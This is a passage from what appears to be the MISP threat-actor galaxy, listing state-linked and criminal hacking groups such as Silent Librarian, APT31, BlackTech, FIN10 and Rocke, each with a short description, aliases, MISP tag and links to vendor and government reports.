https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.domaintools.com/resources/blog/finding-additional-indicators-with-passive-dns-within-domaintools-iris

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2022GTR.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi?id=101738

https://threatintel.eu/2020/02/25/on-sea-turtle-campaign-targeting-greek-governmental-organisations-timeline

https://www.mandiant.com/resources/blog/global-dns-hijacking-campaign-dns-record-manipulation-at-scale

https://www.virusbulletin.com/uploads/pdf/magazine/2019/VB2019-Mercer-Rascagneres.pdf

https://www.youtube.com/watch?v=ws1k44ZhJ3g

Silent Librarian

Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. According to prosecutors, the defendants stole more than 31 terabytes of data from universities, companies, and government agencies around the world. The cost to the universities alone reportedly amounted to approximately $3.4 billion. The information stolen from these universities was used by the Islamic Revolutionary Guard Corps (IRGC) or sold for profit inside Iran. PhishLabs has been tracking this same threat group since late-2017, designating them Silent Librarian. Since discovery, we have been working with the FBI, ISAC partners, and other international law enforcement agencies to help understand and mitigate these attacks.

The tag is: misp-galaxy:threat-actor="Silent Librarian"

Silent Librarian is also known as:

  • COBALT DICKENS

  • Mabna Institute

  • TA407

  • TA4900

  • Yellow Nabu

Table 11980. Table References

Links

https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment

https://info.phishlabs.com/blog/silent-librarian-university-attacks-continue-unabated-in-days-following-indictment

https://www.justice.gov/usao-sdny/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic

https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary

https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again

https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities

https://www.proofpoint.com/us/threat-insight/post/seems-phishy-back-school-lures-target-university-students-and-staff

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

https://www.secureworks.com/research/threat-profiles/cobalt-dickens

https://community.riskiq.com/article/44eb0802

https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect

APT31

FireEye characterizes APT31 as an actor specialized in intellectual property theft, focusing on data and projects that make a particular organization competitive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government. Also according to CrowdStrike, this adversary is suspected of continuing to target upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets. In 2018, CrowdStrike observed this adversary using spear-phishing, URL “web bugs” and scheduled tasks to automate credential harvesting.

The tag is: misp-galaxy:threat-actor="APT31"

APT31 is also known as:

  • ZIRCONIUM

  • JUDGMENT PANDA

  • BRONZE VINEWOOD

  • Red keres

  • Violet Typhoon

  • TA412

  • Zirconium

APT31 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="ZIRCONIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Violet Typhoon" with estimative-language:likelihood-probability="likely"

Table 11981. Table References

Links

https://www.microsoft.com/security/blog/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/

https://duo.com/decipher/apt-groups-moving-down-the-supply-chain

https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf

https://redalert.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists

https://twitter.com/bkMSFT/status/1201876664667582466

https://www.secureworks.com/research/bronz-vinewood-uses-hanaloader-to-target-government-supply-chain

https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains

https://www.secureworks.com/research/threat-profiles/bronze-vinewood

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://research.checkpoint.com/2021/the-story-of-jian

https://supo.fi/-/suojelupoliisi-tunnisti-eduskuntaan-kohdistuneen-kybervakoiluoperaation-apt31-ksi

https://poliisi.fi/-/eduskunnan-tietojarjestelmiin-kohdistuneen-tietomurron-tutkinnassa-selvitetaan-yhteytta-apt31-toimijaan

https://pst.no/alle-artikler/pressemeldinger/etterforskningen-av-datanettverksoperasjonen-mot-fylkesmannsembetene-er-avsluttet

https://www.nrk.no/norge/pst_-har-etterretning-om-at-kinesisk-gruppe-stod-bak-dataangrep-mot-statsforvaltere-1.15540601

https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking

https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking

https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china

https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory/

https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003

https://twitter.com/bkMSFT/status/1417823714922610689

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists

Blackgear

BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts. Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. Two things led us to this conclusion: first, the fake documents that are used as part of its infection routines are now in Japanese. Secondly, it is now using blogging sites and microblogging services based in Japan for its C&C activity.

The tag is: misp-galaxy:threat-actor="Blackgear"

Blackgear is also known as:

  • Topgear

  • Comnie

  • BLACKGEAR

Table 11982. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-espionage-campaign-evolves-adds-japan-target-list/

https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-cyberespionage-campaign-resurfaces-abuses-social-media-for-cc-communication/

BlackOasis

BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.

The tag is: misp-galaxy:threat-actor="BlackOasis"

BlackOasis is also known as:

  • G0063

Table 11983. Table References

Links

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

https://attack.mitre.org/groups/G0063/

BlackTech

BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong. Based on the mutexes and domain names of some of their C&C servers, BlackTech’s campaigns are likely designed to steal their targets’ technology. Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear. PLEAD is an information theft campaign with a penchant for confidential documents. Active since 2012, it has so far targeted Taiwanese government agencies and private organizations. PLEAD’s toolset includes the self-named PLEAD backdoor and the DRIGO exfiltration tool. PLEAD uses spear-phishing emails to deliver and install its backdoor, either as an attachment or through links to cloud storage services. Some of the cloud storage accounts used to deliver PLEAD are also used as drop-off points for exfiltrated documents stolen by DRIGO. PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers enable the router’s VPN feature and then register a machine as a virtual server. This virtual server is used either as a C&C server or as an HTTP server that delivers PLEAD malware to their targets.

The tag is: misp-galaxy:threat-actor="BlackTech"

BlackTech is also known as:

  • CIRCUIT PANDA

  • Temp.Overboard

  • HUAPI

  • Palmerworm

  • G0098

  • T-APT-03

  • Manga Taurus

  • Red Djinn

Table 11984. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/

https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

https://unit42.paloaltonetworks.com/atoms/mangataurus/

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

FIN5

FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.

The tag is: misp-galaxy:threat-actor="FIN5"

FIN5 is also known as:

  • G0053

Table 11985. Table References

Links

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

https://attack.mitre.org/groups/G0053/

FIN1

FireEye first identified this activity during a recent investigation at an organization in the financial industry. They identified the presence of a financially motivated threat group that they track as FIN1, whose activity at the organization dated back several years. The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s), and used this malware to access the victim environment and steal cardholder data. FIN1, which may be located in Russia or a Russian-speaking country based on language settings in many of their custom tools, is known for stealing data that is easily monetized from financial services organizations such as banks, credit unions, ATM operations, and financial transaction processing and financial business services companies.

The tag is: misp-galaxy:threat-actor="FIN1"

Table 11986. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

FIN10

FireEye has observed multiple targeted intrusions occurring in North America — predominately in Canada — dating back to at least 2013 and continuing through at least 2016, in which the attacker(s) have compromised organizations’ networks and sought to monetize this illicit access by exfiltrating sensitive data and extorting victim organizations. In some cases, when the extortion demand was not met, the attacker(s) destroyed production Windows systems by deleting critical operating system files and then shutting down the impacted systems. Based on near parallel TTPs used by the attacker(s) across these targeted intrusions, we believe these clusters of activity are linked to a single, previously unobserved actor or group that we have dubbed FIN10.

The tag is: misp-galaxy:threat-actor="FIN10"

FIN10 is also known as:

  • G0051

Table 11987. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf

https://attack.mitre.org/groups/G0051/

GhostNet

Cyber espionage is an issue whose time has come. In this second report from the Information Warfare Monitor, we lay out the findings of a 10-month investigation of alleged Chinese cyber spying against Tibetan institutions. The investigation, consisting of fieldwork, technical scouting, and laboratory analysis, discovered a lot more. The investigation ultimately uncovered a network of over 1,295 infected hosts in 103 countries. Up to 30% of the infected hosts are considered high-value targets and include computers located at ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The Tibetan computer systems we manually investigated, and from which our investigations began, were conclusively compromised by multiple infections that gave attackers unprecedented access to potentially sensitive information.

Attacks on the Dalai Lama’s Private Office: The OHHDL started to suspect it was under surveillance while setting up meetings between His Holiness and foreign dignitaries. They sent an email invitation on behalf of His Holiness to a foreign diplomat, but before they could follow it up with a courtesy telephone call, the diplomat’s office was contacted by the Chinese government and warned not to go ahead with the meeting. The Tibetans wondered whether a computer compromise might be the explanation; they called ONI Asia who called us. (Until May 2008, the first author was employed on a studentship funded by the OpenNet Initiative and the second author was a principal investigator for ONI.)

The tag is: misp-galaxy:threat-actor="GhostNet"

GhostNet is also known as:

  • Snooping Dragon

Table 11988. Table References

Links

http://www.nartv.org/mirror/ghostnet.pdf

https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-746.pdf

https://en.wikipedia.org/wiki/GhostNet

GozNym

IBM X-Force Research uncovered a Trojan hybrid spawned from the Nymaim and Gozi ISFB malware. It appears that the operators of Nymaim have recompiled its source code with part of the Gozi ISFB source code, creating a combination that is being actively used in attacks against more than 24 U.S. and Canadian banks, stealing millions of dollars so far. X-Force named this new hybrid GozNym. The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers. The end result is a new banking Trojan in the wild.

The tag is: misp-galaxy:threat-actor="GozNym"

Table 11989. Table References

Links

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://threatpost.com/attackers-behind-goznym-trojan-set-sights-on-europe/117647/

https://threatpost.com/goznym-banking-trojan-targeting-german-banks/120075/

https://www.europol.europa.eu/newsroom/news/goznym-malware-cybercriminal-network-dismantled-in-international-operation

Group5

A threat actor using Iranian-language tools and Iranian hosting companies, and at times operating from Iranian IP space, was observed targeting the Syrian opposition in an elaborately staged malware operation, Citizen Lab researchers reveal. The operation was first noticed in late 2015, when a member of the Syrian opposition flagged a suspicious email containing a PowerPoint slideshow, which led researchers to a watering hole website with malicious programs, malicious PowerPoint files, and Android malware. The threat actor was targeting Windows and Android devices of well-connected individuals in the Syrian opposition, researchers discovered. They called the actor Group5 because it targets the Syrian opposition after four others did the same in the past: regime-linked malware groups, the Syrian Electronic Army, ISIS (also known as the Islamic State or ISIL), and a group linked to Lebanon.

The tag is: misp-galaxy:threat-actor="Group5"

Group5 is also known as:

  • G0043

Table 11990. Table References

Links

https://www.securityweek.com/iranian-actor-group5-targeting-syrian-opposition

https://attack.mitre.org/groups/G0043/

Honeybee

McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them. The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.

The tag is: misp-galaxy:threat-actor="Honeybee"

Honeybee is also known as:

  • G0072

Table 11991. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

https://attack.mitre.org/groups/G0072/

Lucky Cat

A series of attacks, targeting both Indian military research and south Asian shipping organizations, demonstrate the minimum level of effort required to successfully compromise a target and steal sensitive information. The attackers use very simple malware, which required little development time or skills, in conjunction with freely available Web hosting, to implement a highly effective attack. It is a case of the attackers obtaining a maximum return on their investment. The attack shows how an intelligent attacker does not need to be particularly technically skilled in order to steal the information they are after. The attack begins, as is often the case, with an email sent to the victim. A malicious document is attached to the email, which, when loaded, activates the malware. The attackers use tailored emails to encourage the victim to open the attachment. For example, one email sent to an academic claimed to be a call for papers (CFP) for a conference. The vast majority of the victims were based in India, with some in Malaysia. The victim industry was mostly military research and also shipping based in the Arabian and South China seas. In some instances the attackers appeared to have a clear goal, whereby specific files were retrieved from certain compromised computers. In other cases, the attackers used more of a ‘shotgun’ like approach, copying every file from a computer. Military technologies were obviously the focus of one particular attack, with what appeared to be source code stolen. 45 different attacker IP addresses were observed. Out of those, 43 were within the same IP address range based in Sichuan province, China. The remaining two were based in South Korea. The pattern of attacker connections implies that the IP addresses are being used as a VPN, probably in an attempt to render the attackers anonymous. The attacks have been active from at least April 2011 up to February 2012. The attackers are intelligent and focused, employing the minimum amount of work necessary for the maximum gain. They do not use zero-day exploits or complicated threats; instead they rely on effective social engineering and lax security measures on the part of the victims.

The tag is: misp-galaxy:threat-actor="Lucky Cat"

Lucky Cat is also known as:

  • TA413

  • White Dev 9

Table 11992. Table References

Links

https://vx-underground.org/papers/luckycat-hackers-12-en.pdf

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf

https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global

https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic

RTM

There are several groups actively and profitably targeting businesses in Russia. A trend that we have seen unfold before our eyes lately is these cybercriminals’ use of simple backdoors to gain a foothold in their targets’ networks. Once they have this access, a lot of the work is done manually, slowly getting to understand the network layout and deploying custom tools the criminals can use to steal funds from these entities. Some of the groups that best exemplify these trends are Buhtrap, Cobalt and Corkow. The group discussed in this white paper is part of this new trend. We call this new group RTM; it uses custom malware, written in Delphi, that we cover in detail in later sections. The first trace of this tool in our telemetry data dates back to late 2015. The group also makes use of several different modules that they deploy where appropriate to their targets. They are interested in users of remote banking systems (RBS), mainly in Russia and neighboring countries.

The tag is: misp-galaxy:threat-actor="RTM"

RTM is also known as:

  • G0048

Table 11993. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

https://attack.mitre.org/groups/G0048/

Shadow Network

Shadows in the Cloud documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems in India, the Offices of the Dalai Lama, the United Nations, and several other countries. The report also contains an analysis of data which were stolen from politically sensitive targets and recovered during the course of the investigation. These include documents from the Offices of the Dalai Lama and agencies of the Indian national security establishment. Data containing sensitive information on citizens of numerous third-party countries, as well as personal, financial, and business information, were also exfiltrated and recovered during the course of the investigation. The report analyzes the malware ecosystem employed by the Shadows’ attackers, which leveraged multiple redundant cloud computing systems, social networking platforms, and free web hosting services in order to maintain persistent control while operating core servers located in the People’s Republic of China (PRC). Although the identity and motivation of the attackers remain unknown, the report is able to determine the location (Chengdu, PRC) as well as some of the associations of the attackers through circumstantial evidence. The investigation is the product of an eight month, collaborative activity between the Information Warfare Monitor (Citizen Lab and SecDev) and the Shadowserver Foundation. The investigation employed a fusion methodology, combining technical interrogation techniques, data analysis, and field research, to track and uncover the Shadow cyber espionage network.

The tag is: misp-galaxy:threat-actor="Shadow Network"

Table 11994. Table References

Links

https://citizenlab.ca/wp-content/uploads/2017/05/shadows-in-the-cloud.pdf

Slingshot

While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new, and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity. While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to MikroTik routers and placed a component downloaded by Winbox Loader, a management suite for MikroTik routers. In turn, this infected the administrator of the router. We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).

The tag is: misp-galaxy:threat-actor="Slingshot"

Table 11995. Table References

Links

https://securelist.com/apt-slingshot/84312/

Taidoor

The Taidoor attackers have been actively engaging in targeted attacks since at least March 4, 2009. Despite some exceptions, the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments. One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government. The attackers spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues. The attackers actively sent out malicious documents and maintained several IP addresses for command and control. As part of their social engineering ploy, the Taidoor attackers attach a decoy document to their emails that, when opened, displays the contents of a legitimate document but executes a malicious payload in the background. We were only able to gather a limited amount of information regarding the Taidoor attackers’ activities after they have compromised a target. We did, however, find that the Taidoor malware allowed attackers to operate an interactive shell on compromised computers and to upload and download files. In order to determine the operational capabilities of the attackers behind the Taidoor campaign, we monitored a compromised honeypot. The attackers issued some basic commands in an attempt to map out the extent of the network compromise but quickly realized that the honeypot was not an intended target and so promptly disabled the Taidoor malware running on it. This indicated that while the Taidoor malware was more widely distributed compared with malware tied to other targeted campaigns, the attackers could quickly assess their targets and distinguish these from inadvertently compromised computers and honeypots.

The tag is: misp-galaxy:threat-actor="Taidoor"

Taidoor is also known as:

  • G0015

  • Earth Aughisky

Table 11996. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf

https://attack.mitre.org/groups/G0015/

https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html

https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat

TEMP.Veles

TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.

The tag is: misp-galaxy:threat-actor="TEMP.Veles"

TEMP.Veles is also known as:

  • Xenotime

  • G0088

  • ATK91

Table 11997. Table References

Links

https://dragos.com/resource/trisis-analyzing-safety-system-targeting-malware/

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://attack.mitre.org/groups/G0088/

https://cyberthreat.thalesgroup.com/attackers/ATK91

https://www.dragos.com/threat/xenotime/

WindShift

In August of 2018, DarkMatter released a report entitled “In the Trails of WINDSHIFT APT”, which unveiled a threat actor with TTPs very similar to those of Bahamut. Subsequently, two additional articles were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems. Pivoting on specific file attributes and infrastructure indicators, Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency.

The tag is: misp-galaxy:threat-actor="WindShift"

WindShift is also known as:

  • Windy Phoenix

Table 11998. Table References

Links

https://unit42.paloaltonetworks.com/shifting-in-the-wind-windshift-attacks-target-middle-eastern-governments/

https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf

https://unit42.paloaltonetworks.com/atoms/windyphoenix/

[Unnamed group]

Over the last few weeks, several significant leaks regarding a number of Iranian APTs took place. After analyzing and investigating the documents we conclude that they are authentic. Consequently, this causes considerable harm to the groups and their operation. The identity of the actor behind the leak is currently unknown; however, based on the scope and the quality of the exposed documents and information, it appears that they are professional and highly capable. This leak will likely hamstring the groups' operation in the near future. Accordingly, in our assessment this will minimize the risk of potential attacks in the next few months and possibly even year. Note: most of the leaks are posted on Telegram channels that were created specifically for this purpose. Below are the three main Telegram groups on which the leaks were posted:

  • Lab Dookhtegam (pseudonym; "The people whose lips are stitched and sealed", translated from Persian): in this channel attack tools attributed to the group 'OilRig' were leaked, including a webshell that was inserted into the Technion, various tools that were used for DNS attacks, and more.

  • Green Leakers: in this channel attack tools attributed to the group 'MuddyWater' were leaked. The group’s name and its symbol are identified with the "green movement", which led the protests in Iran after the Presidential elections in 2009. These protests were heavily repressed by the Revolutionary Guards (IRGC).

  • Black Box: unlike the previous two channels, this one has been around for a long time. On Friday May 5th, dozens of confidential documents labeled as "secret" (a high confidentiality level in Iran, one below the highest, top secret) were posted on this channel. The documents were related to Iranian attack groups' activity.

The tag is: misp-galaxy:threat-actor="[Unnamed group]"

Table 11999. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2019/05/Iranian-Nation-State-APT-Leak-Analysis-and-Overview.pdf

DUNGEON SPIDER

DUNGEON SPIDER is a criminal group operating the ransomware most commonly known as Locky, which has been active since February 2016 and was last observed in late 2017. Locky is a ransomware tool that encrypts files using a combination of cryptographic algorithms: RSA with a key size of 2,048 bits, and AES with a key size of 128 bits. Locky targets a large number of file extensions and is able to encrypt data on shared network drives. In an attempt to further impact victims and prevent file recovery, Locky deletes all of the Shadow Volume Copies on the machine. DUNGEON SPIDER primarily relies on broad spam campaigns with malicious attachments for distribution. Locky is the community/industry name associated with this actor.

The tag is: misp-galaxy:threat-actor="DUNGEON SPIDER"

Table 12000. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-october-dungeon-spider/

Fxmsp

Throughout 2017 and 2018, Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground. Some of the known Fxmsp TTPs included accessing network environments via externally available remote desktop protocol (RDP) servers and exposed Active Directory. Most recently, the actor claimed to have developed a credential-stealing botnet capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords. Fxmsp has claimed that developing this botnet and improving its capabilities for stealing information from secured systems is their main goal.

The tag is: misp-galaxy:threat-actor="Fxmsp"

Table 12001. Table References

Links

https://www.advanced-intel.com/blog/top-tier-russian-hacking-collective-claims-breaches-of-three-major-anti-virus-companies

Gnosticplayers

The hacker said that he put up the data for sale mainly because these companies had failed to protect passwords with strong hashing algorithms like bcrypt. Most of the hashed passwords the hacker put up for sale today can be cracked with various levels of difficulty, but they can be cracked. "I got upset because I feel no one is learning," the hacker told ZDNet in an online chat earlier today. "I just felt upset at this particular moment, because seeing this lack of security in 2019 is making me angry." In a conversation with ZDNet last month, the hacker told us he wanted to hack and put up for sale more than one billion records and then retire and disappear with the money. But in a conversation today, the hacker says this is not his target anymore, as he learned that other hackers have already achieved the same goal before him. Gnosticplayers also revealed that not all the data he obtained from hacked companies had been put up for sale. Some companies gave in to extortion demands and paid fees so breaches would remain private. "I came to an agreement with some companies, but the concerned startups won’t see their data for sale," he said. "I did it that’s why I can’t publish the rest of my databases or even name them."

The tag is: misp-galaxy:threat-actor="Gnosticplayers"

Table 12002. Table References

Links

https://www.zdnet.com/article/round-4-hacker-returns-and-puts-26mil-user-records-for-sale-on-the-dark-web/

https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/

https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/

https://www.zdnet.com/article/hacker-puts-up-for-sale-third-round-of-hacked-databases-on-the-dark-web/

https://www.zdnet.com/article/a-hacker-has-dumped-nearly-one-billion-user-records-over-the-past-two-months/

Hacking Team

The many 0-days that had been collected by Hacking Team and which became publicly available during the breach of their organization in 2015, have been used by several APT groups since. Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone. The company has been criticized for selling these capabilities to authoritarian governments – an allegation it has consistently denied. When the tables turned in July 2015, with Hacking Team itself suffering a damaging hack, the reported use of RCS by oppressive regimes was confirmed. With 400GB of internal data – including the once-secret list of customers, internal communications, and spyware source code – leaked online, Hacking Team was forced to request its customers to suspend all use of RCS, and was left facing an uncertain future. Following the hack, the security community has been keeping a close eye on the company’s efforts to get back on its feet. The first reports suggesting Hacking Team’s resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild. A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team’s shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.

The tag is: misp-galaxy:threat-actor="Hacking Team"

Table 12003. Table References

Links

https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/

https://en.wikipedia.org/wiki/Hacking_Team

https://www.vice.com/en_us/article/gvye3m/spy-tech-company-hacking-team-gets-hacked

OurMine

OurMine is known for hijacking celebrity internet accounts, often committing cyber vandalism, to advertise their commercial services. (Trend Micro) In light of the recent report detailing its willingness to pay US$250,000 in exchange for the 1.5 terabytes’ worth of data swiped by hackers from its servers, HBO finds itself dealing with yet another security breach. Known for hijacking prominent social media accounts, the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network. These include accounts for HBO shows, such as “Game of Thrones,” “Girls,” and “Ballers.” This is not the first time that OurMine has claimed responsibility for hacking high-profile social networking accounts. Last year, the group victimized Marvel, The New York Times, and even the heads of some of the biggest technology companies in the world. Mark Zuckerberg, Jack Dorsey, Sundar Pichai, and Daniel Ek — the CEOs of Facebook, Twitter, Google and Spotify, respectively — have also fallen victim to the hackers, dispelling the notion that a career in software and technology exempts one from being compromised.

The tag is: misp-galaxy:threat-actor="OurMine"

Table 12004. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hbo-twitter-and-facebook-accounts-hacked-by-ourmine

https://gizmodo.com/welp-vevo-just-got-hacked-1813390834

https://www.grahamcluley.com/despite-appearances-wikileaks-wasnt-hacked/

https://en.wikipedia.org/wiki/OurMine

Pacha Group

Antd is a miner found in the wild on September 18, 2018. Recently we discovered that the authors of Antd are actively delivering newer campaigns deploying a broad number of components, most of them completely undetected and operating within compromised third-party Linux servers. Furthermore, we have observed that some of the techniques implemented by this group are unconventional, and there is an element of sophistication to them. We believe the authors behind this malware are of Chinese origin. We have labeled the undetected Linux.Antd variants Linux.GreedyAntd and classified the threat actor as Pacha Group.

The tag is: misp-galaxy:threat-actor="Pacha Group"

Table 12005. Table References

Links

https://www.intezer.com/blog-technical-analysis-pacha-group/

https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/

Rocke

This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.

The tag is: misp-galaxy:threat-actor="Rocke"

Rocke is also known as:

  • Aged Libra

Table 12006. Table References

Links

https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

